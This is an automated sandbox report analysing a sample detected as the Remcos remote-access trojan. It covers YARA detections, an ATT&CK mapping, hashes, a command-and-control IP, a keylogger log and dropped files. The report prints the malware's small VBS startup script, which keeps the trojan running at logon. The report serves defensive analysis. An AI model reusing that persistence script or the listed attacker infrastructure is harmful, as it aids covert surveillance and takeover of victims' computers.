                Source: Allene.exeBinary or memory string: WIN_XP
                Source: Allene.exeBinary or memory string: WIN_XPe
                Source: Allene.exeBinary or memory string: WIN_VISTA
                Source: Allene.exeBinary or memory string: WIN_7
                Source: Allene.exeBinary or memory string: WIN_8
                Source: Allene.exe, 00000004.00000002.1919469392.0000000000684000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Detected Remcos RAT
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-R1T905Jump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-R1T905Jump to behavior
                Yara detected Remcos RAT
                Source: Yara matchFile source: 4.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Allene.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.Allene.exe.3920000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.Allene.exe.3920000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Allene.exe.18b0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.Allene.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Allene.exe.18b0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1920045593.0000000001948000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4156569703.00000000012B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4156176304.0000000001058000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4157121061.0000000003DDE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.4156339648.00000000010FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Allene.exe PID: 7132, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Allene.exe PID: 2872, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: cmd.exe1_2_00405042
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008F6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_008F6283
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008F6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_008F6747
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00646283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,1_2_00646283
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00646747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,1_2_00646747

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information111
                Scripting                		2
                Valid Accounts                		2
                Native API                		111
                Scripting                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services11
                Archive Collected Data                		11
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts1
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		121
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol121
                Input Capture                		2
                Encrypted Channel                		Exfiltration Over Bluetooth1
                Defacement
                Email AddressesDNS ServerDomain Accounts2
                Service Execution                		2
                Valid Accounts                		1
                Bypass User Account Control                		21
                Obfuscated Files or Information                		2
                Credentials In Files                		1
                System Service Discovery                		SMB/Windows Admin Shares3
                Clipboard Data                		1
                Remote Access Software                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCron1
                Windows Service                		2
                Valid Accounts                		1
                Software Packing                		NTDS4
                File and Directory Discovery                		Distributed Component Object ModelInput Capture1
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchd2
                Registry Run Keys / Startup Folder                		21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets26
                System Information Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                Windows Service                		1
                Bypass User Account Control                		Cached Domain Credentials131
                Security Software Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items22
                Process Injection                		1
                Masquerading                		DCSync1
                Virtualization/Sandbox Evasion                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job2
                Registry Run Keys / Startup Folder                		2
                Valid Accounts                		Proc Filesystem2
                Process Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Virtualization/Sandbox Evasion                		/etc/passwd and /etc/shadow11
                Application Window Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                Access Token Manipulation                		Network Sniffing1
                System Owner/User Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd22
                Process Injection                		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                7056ZCiFdE.exe55%ReversingLabsWin32.Trojan.AutoitInject
                7056ZCiFdE.exe67%VirustotalBrowse
                7056ZCiFdE.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Milburr\Allene.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Milburr\Allene.exe55%ReversingLabsWin32.Trojan.AutoitInject
                C:\Users\user\AppData\Local\Milburr\Allene.exe67%VirustotalBrowse

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                No contacted domains info

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://geoplugin.net/json.gpAllene.exefalse
                  		high
                  http://geoplugin.net/json.gp/CAllene.exe, 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Allene.exe, 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, Allene.exe, 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, Allene.exe, 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmpfalse
                    		high

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    192.210.150.26
                    		unknownUnited States
                    		36352AS-COLOCROSSINGUStrue

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1570884
                    Start date and time:2024-12-08 09:30:25 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 9m 30s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:7056ZCiFdE.exe
                    renamed because original name is a hash value
                    Original Sample Name:6f0604f8a16b94b61d714dfec11d0358.exe
                    Detection:MAL
                    Classification:mal100.rans.troj.spyw.expl.evad.winEXE@6/7@0/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 57
                    • Number of non-executed functions: 282
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report creation exceeded maximum time and may have missing disassembly code information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    03:31:57API Interceptor6353343x Sleep call for process: Allene.exe modified
                    08:31:27AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Allene.vbs

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    192.210.150.26uIarPolvHR.exeGet hashmaliciousRemcosBrowse
                      IB9876789000.bat.exeGet hashmaliciousRemcosBrowse
                        z49FACTURA-0987678.exeGet hashmaliciousRemcosBrowse
                          FAT6789098700900.scr.exeGet hashmaliciousRemcosBrowse
                            Rgh99876k7e.exeGet hashmaliciousRemcosBrowse
                              SALKI098765R400.exeGet hashmaliciousRemcosBrowse
                                FTE98767800000.bat.exeGet hashmaliciousRemcosBrowse

                                  Domains

                                  No context

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  AS-COLOCROSSINGUSuIarPolvHR.exeGet hashmaliciousRemcosBrowse
                                  • 192.210.150.26
                                  IB9876789000.bat.exeGet hashmaliciousRemcosBrowse
                                  • 192.210.150.26
                                  meerkat.x86.elfGet hashmaliciousMiraiBrowse
                                  • 104.168.61.38
                                  CGDL.docGet hashmaliciousUnknownBrowse
                                  • 192.3.172.208
                                  seemejkiss.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                  • 107.175.113.196
                                  seemybestdayguvenu.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                  • 172.245.123.29
                                  k4PAIh16E6.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                  • 192.3.118.10
                                  scan_241205-801_draft_PO.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                  • 104.168.7.16
                                  Transferencia de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                  • 192.3.243.136
                                  LdSbZG1iH6.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                  • 192.3.64.152

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\ProgramData\remcos\logs.dat

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Milburr\Allene.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):204
                                  Entropy (8bit):3.3573372569087336
                                  Encrypted:false
                                  SSDEEP:3:rhlKlyK1uflfT5JWRal2Jl+7R0DAlBG45klovDl64oojklovDl6v:6lZEfp5YcIeeDAlOWA41gWAv
                                  MD5:CB176B70DAA2CC265D36380D483E945F
                                  SHA1:CDA860866DC427EF3FD6BF09234812931D8470AD
                                  SHA-256:309E1CA9340FF21BF92AB0216B9C6E45B4F61A43CA5A4EF636A508CE56D423D4
                                  SHA-512:29129381A9F3608C789E908DD1659F5CD9A0057485D789E550CF3E3D6C53BDAF0B1CCE8EDDFD02F031A0684089AC2335430AFCCF3A659F317D9F96F86211ACC2
                                  Malicious:true
                                  Yara Hits:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                  Reputation:low
                                  Preview:....[.2.0.2.4./.1.2./.0.8. .0.3.:.3.1.:.2.5. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                  C:\Users\user\AppData\Local\Milburr\Allene.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\7056ZCiFdE.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                  Category:dropped
                                  Size (bytes):885760
                                  Entropy (8bit):7.96449026748468
                                  Encrypted:false
                                  SSDEEP:24576:drl6kD68JmlotQfAVnxag+/zxRlk4t4p5G5wJm1wr:Zl328U2yfAVnsgSWpg5km
                                  MD5:6F0604F8A16B94B61D714DFEC11D0358
                                  SHA1:558828C2EAD68EA5883655299A3F0BFAD1981AE5
                                  SHA-256:28331E2705BF58BD76A9F8BA0F0A431B762EAF6E4284DBF12F1453DD3FECF281
                                  SHA-512:76EBD74EC7B965FF20AAD25AA6C0DFC5B7EFEF087F6BD4BF6F0B2F08427AC65BF320305DB16FF00CEBC5BFC98C8F22014ED5E7C9CEDD37A05721B330326C4EB3
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 55%
                                  • Antivirus: Virustotal, Detection: 67%, Browse
                                  Reputation:low
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L....eRg.........."......`...0...0..P....@........@.......................................@...@.......@........................$...................................................................4...H...........................................UPX0.....0..............................UPX1.....`...@...^..................@....rsrc....0......."...b..............@..............................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....

                                  C:\Users\user\AppData\Local\Temp\Anglophile

                                  Download File
                                  Process:C:\Users\user\Desktop\7056ZCiFdE.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):492544
                                  Entropy (8bit):7.63343625326173
                                  Encrypted:false
                                  SSDEEP:12288:X2BF3zOqNhLkZUidJm1/Inj15y1KojPGdn:XuZviS1/v1Odn
                                  MD5:3CB6ABD40FBA1EDDD8A7DDA9994BA7F7
                                  SHA1:2C563FAD704A5E5407F38AFF2E47C72138944106
                                  SHA-256:4B2E35D8CD82164975B338E118EBFBD621D1AFB5E768A12936F7F9D0B6C1B9E0
                                  SHA-512:CA9C2B1DEAF0DA7DB93AD63CF98010EF28D5B07E50213984842996A14796AE88E774583F487510F1860CBDD5B58CF51523F928C8FDE6622F80352CAC6BA7B77F
                                  Malicious:false
                                  Reputation:low
                                  Preview:}..4D67BAUE5..0O.WU0RI4Gv7BEUE5NC0OMWU0RI4G67BEUE5NC0OMWU0RI<F67LZ.K5.J.n.V..s.\.E.27:"G/..,,9;_&iV".E7+u,[n...m::T7g9J<.BEUE5NC.f...x..........9.k.....<.c.T~.I.n.....g.......\.........................................\l......T.......]b...... W/....UE5NC0OM..0R.5B6\.a2E5NC0OMW.0PH?F8'B%PE5nA0OMWU.iJ4G&7BE%@5NCpOMGU0RK4G37CEUE5NF0NMWU0RI.@67FEUE5NC2OM.U0BI4W67BEEE5^C0OMWU RI4G67BEUE5n.6OIVU0R)3G..BEUE5NC0OMWU0RI4G67.BU..NC .KWm0RI4G67BEUE5NC0OMWU.O4_67B..C5.C0OMWU0RI4G6GGE.A5NC0OMWU0RI4G67BEUE5NC0OMW{D71@G67_.PE5^C0O-RU0VI4G67BEUE5NC0OmWUP|;P&BVBEU.4NC@JMW.1RIPB67BEUE5NC0OMW.0R..#WC#EUEY.C0OMPU0\I4G.1BEUE5NC0OMWU0.I4..E176E5N.xOMW57RI~G67.CUE5NC0OMWU0RItG6wl70)Z-C0.vWU0.N4G.7BE.B5NC0OMWU0RI4Gv7B.UE5NC0OMWU0RI4G67BEUE5NC0OMWU0RI4G67BEUE5NC0OMWU0RI4G67BEUE5NC0OMWU0RI4G67BEUE5NC0OMWU0RI4G67BEUE5NC0OMWU0RI4G67BEUE5NC0OMWU0RI4G67BEUE5NC0OMWU0RI4G67BEUE5NC0OMWU0RI4G67BEUE5NC0OMWU0RI4G67BEUE5NC0OMWU0RI4G67BEUE5NC0OMWU0RI4G67BEUE5NC0OMWU0RI4G67BEUE5NC0OMWU0RI4G67BEUE5NC0OMWU0RI4G67BEUE5

                                  C:\Users\user\AppData\Local\Temp\aut30FA.tmp

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Milburr\Allene.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):423980
                                  Entropy (8bit):7.985815089552733
                                  Encrypted:false
                                  SSDEEP:6144:25V/D8z7yiqubuaLDja6J0YeeJ50+YPJc043YBYc/B7k4vhozdky5ly26tqlrxuO:2z7il3Y7eJ5nYPJoYBTlkohOqakSlOK9
                                  MD5:CBDEE7E56FE6E632838A31ADF1435807
                                  SHA1:9AC24BD12E4369785742E075F81B9B6A50EBABBD
                                  SHA-256:DC44AEE08535CFCA123FE35EC2EE62E4D0457A82A370F709E6BDC95B9F26F11C
                                  SHA-512:E058194D24BCBB56638E3E63E0E50D2F4FA2A6956DC57EAAC73E11F215190940B5AB3744DF567FFE1A29B7D324422B3DED9E339E1188F910BBC6EC32496E72A9
                                  Malicious:false
                                  Reputation:low
                                  Preview:EA06......;3J$.oB..h.]..aO.....&iG.M.TP.2.C.S..y....s.4.oL.{.s_.+.n..?.v.....Sy../.D%....&..Qj,.Wu.V..{.r.:.U&.y.*y..L.2....o...2...~....5k.. .....c../..'.n.z!~........>.C.\.{...!...c....)..k.Y...+....M.....e@.,n...q..>....p.x.....p../^....q.........4u..L*PY..m\..f@....*....q'.Ij.Y.....B.4...L..Ih....M.......g7..h.i.8.w.J..oF....M..f.*L....h.Z...$.*.h...MX...........Ux..u.A....1.7c/O.W...nB.5.....G..h 9.m.7......j..1.mJ.0...|6.V.|..$.*....S.t.U6...5...g...T.1..^.#..+10.6.U.W...4..G..Rf.x..c7........5..7..#yC.....y...7.JkR...v..<T.....Gh@.?..a.........t.....!..[...)....W.|.s.L.m..R..Z.._u..e..J!..h.PZ..c:.P....J...f.{..Q.........D...._..P...ef.C.B.J..##.....,&..rk..[.......S]5..O.....'.Q.M(Q...p.L4.*.Va:.. Sn...V..1....Ki.L7T.%.m_.Jb.^..3..2....4..u4:,..X.r3...,...F~4..Wd..G....qm@.G.|..Rk..G."..kn .GB...[. .G2...........,....9b...r+3..B(......N..9...&(.....%..9. .&`...@..}..9.....&.rk..V..0....2i...(4Xf..b.L).YL..R..3Y.o.?..?.+.?KU.L

                                  C:\Users\user\AppData\Local\Temp\autE914.tmp

                                  Download File
                                  Process:C:\Users\user\Desktop\7056ZCiFdE.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):423980
                                  Entropy (8bit):7.985815089552733
                                  Encrypted:false
                                  SSDEEP:6144:25V/D8z7yiqubuaLDja6J0YeeJ50+YPJc043YBYc/B7k4vhozdky5ly26tqlrxuO:2z7il3Y7eJ5nYPJoYBTlkohOqakSlOK9
                                  MD5:CBDEE7E56FE6E632838A31ADF1435807
                                  SHA1:9AC24BD12E4369785742E075F81B9B6A50EBABBD
                                  SHA-256:DC44AEE08535CFCA123FE35EC2EE62E4D0457A82A370F709E6BDC95B9F26F11C
                                  SHA-512:E058194D24BCBB56638E3E63E0E50D2F4FA2A6956DC57EAAC73E11F215190940B5AB3744DF567FFE1A29B7D324422B3DED9E339E1188F910BBC6EC32496E72A9
                                  Malicious:false
                                  Reputation:low
                                  Preview:EA06......;3J$.oB..h.]..aO.....&iG.M.TP.2.C.S..y....s.4.oL.{.s_.+.n..?.v.....Sy../.D%....&..Qj,.Wu.V..{.r.:.U&.y.*y..L.2....o...2...~....5k.. .....c../..'.n.z!~........>.C.\.{...!...c....)..k.Y...+....M.....e@.,n...q..>....p.x.....p../^....q.........4u..L*PY..m\..f@....*....q'.Ij.Y.....B.4...L..Ih....M.......g7..h.i.8.w.J..oF....M..f.*L....h.Z...$.*.h...MX...........Ux..u.A....1.7c/O.W...nB.5.....G..h 9.m.7......j..1.mJ.0...|6.V.|..$.*....S.t.U6...5...g...T.1..^.#..+10.6.U.W...4..G..Rf.x..c7........5..7..#yC.....y...7.JkR...v..<T.....Gh@.?..a.........t.....!..[...)....W.|.s.L.m..R..Z.._u..e..J!..h.PZ..c:.P....J...f.{..Q.........D...._..P...ef.C.B.J..##.....,&..rk..[.......S]5..O.....'.Q.M(Q...p.L4.*.Va:.. Sn...V..1....Ki.L7T.%.m_.Jb.^..3..2....4..u4:,..X.r3...,...F~4..Wd..G....qm@.G.|..Rk..G."..kn .GB...[. .G2...........,....9b...r+3..B(......N..9...&(.....%..9. .&`...@..}..9.....&.rk..V..0....2i...(4Xf..b.L).YL..R..3Y.o.?..?.+.?KU.L

                                  C:\Users\user\AppData\Local\Temp\autF7AA.tmp

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Milburr\Allene.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):423980
                                  Entropy (8bit):7.985815089552733
                                  Encrypted:false
                                  SSDEEP:6144:25V/D8z7yiqubuaLDja6J0YeeJ50+YPJc043YBYc/B7k4vhozdky5ly26tqlrxuO:2z7il3Y7eJ5nYPJoYBTlkohOqakSlOK9
                                  MD5:CBDEE7E56FE6E632838A31ADF1435807
                                  SHA1:9AC24BD12E4369785742E075F81B9B6A50EBABBD
                                  SHA-256:DC44AEE08535CFCA123FE35EC2EE62E4D0457A82A370F709E6BDC95B9F26F11C
                                  SHA-512:E058194D24BCBB56638E3E63E0E50D2F4FA2A6956DC57EAAC73E11F215190940B5AB3744DF567FFE1A29B7D324422B3DED9E339E1188F910BBC6EC32496E72A9
                                  Malicious:false
                                  Reputation:low
                                  Preview:EA06......;3J$.oB..h.]..aO.....&iG.M.TP.2.C.S..y....s.4.oL.{.s_.+.n..?.v.....Sy../.D%....&..Qj,.Wu.V..{.r.:.U&.y.*y..L.2....o...2...~....5k.. .....c../..'.n.z!~........>.C.\.{...!...c....)..k.Y...+....M.....e@.,n...q..>....p.x.....p../^....q.........4u..L*PY..m\..f@....*....q'.Ij.Y.....B.4...L..Ih....M.......g7..h.i.8.w.J..oF....M..f.*L....h.Z...$.*.h...MX...........Ux..u.A....1.7c/O.W...nB.5.....G..h 9.m.7......j..1.mJ.0...|6.V.|..$.*....S.t.U6...5...g...T.1..^.#..+10.6.U.W...4..G..Rf.x..c7........5..7..#yC.....y...7.JkR...v..<T.....Gh@.?..a.........t.....!..[...)....W.|.s.L.m..R..Z.._u..e..J!..h.PZ..c:.P....J...f.{..Q.........D...._..P...ef.C.B.J..##.....,&..rk..[.......S]5..O.....'.Q.M(Q...p.L4.*.Va:.. Sn...V..1....Ki.L7T.%.m_.Jb.^..3..2....4..u4:,..X.r3...,...F~4..Wd..G....qm@.G.|..Rk..G."..kn .GB...[. .G2...........,....9b...r+3..B(......N..9...&(.....%..9. .&`...@..}..9.....&.rk..V..0....2i...(4Xf..b.L).YL..R..3Y.o.?..?.+.?KU.L

                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Allene.vbs

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Milburr\Allene.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):268
                                  Entropy (8bit):3.3984013364689636
                                  Encrypted:false
                                  SSDEEP:6:DMM8lfm3OOQdUfcloRKUEZ+lX1olFgAD76nriIM8lfQVn:DsO+vNloRKQ1olvDcmA2n
                                  MD5:9ADBEDC65F332D0F3CB23DF19C449A76
                                  SHA1:C8BCEB35573CAB38C15BCF700483AD757ACB35CD
                                  SHA-256:CF46956B53F2A99BB538A9E6F04B3086ECDDE52A903B9ED61C9FDCF96E8E45C0
                                  SHA-512:593057C22675DCB5B372B93ACA759178339EFCEEA0DD68C6B03214CACE876BAA0FBCD7F6B7D79947B989D7011805E8BC5A23B6D1881F78641D9741A297455844
                                  Malicious:true
                                  Reputation:low
                                  Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.l.b.u.r.r.\.A.l.l.e.n.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                  Entropy (8bit):7.96449026748468
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.39%
                                  • UPX compressed Win32 Executable (30571/9) 0.30%
                                  • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  File name:7056ZCiFdE.exe
                                  File size:885'760 bytes
                                  MD5:6f0604f8a16b94b61d714dfec11d0358
                                  SHA1:558828c2ead68ea5883655299a3f0bfad1981ae5
                                  SHA256:28331e2705bf58bd76a9f8ba0f0a431b762eaf6e4284dbf12f1453dd3fecf281
                                  SHA512:76ebd74ec7b965ff20aad25aa6c0dfc5b7efef087f6bd4bf6f0b2f08427ac65bf320305db16ff00cebc5bfc98c8f22014ed5e7c9cedd37a05721b330326c4eb3
                                  SSDEEP:24576:drl6kD68JmlotQfAVnxag+/zxRlk4t4p5G5wJm1wr:Zl328U2yfAVnsgSWpg5km
                                  TLSH:99152352CDC1D923C9FD6B348036CD5009A93471AEA6272EC719E64FFC31347A85BB99
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                  File Icon

                                  Icon Hash:aaf3e3e3938382a0

                                  Static PE Info

                                  General

                                  Entrypoint:0x559a50
                                  Entrypoint Section:UPX1
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x67526584 [Fri Dec 6 02:46:28 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:fc6683d30d9f25244a50fd5357825e79

                                  Entrypoint Preview

                                  Instruction
                                  pushad
                                  mov esi, 00504000h
                                  lea edi, dword ptr [esi-00103000h]
                                  push edi
                                  jmp 00007F93651125ADh
                                  nop
                                  mov al, byte ptr [esi]
                                  inc esi
                                  mov byte ptr [edi], al
                                  inc edi
                                  add ebx, ebx
                                  jne 00007F93651125A9h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
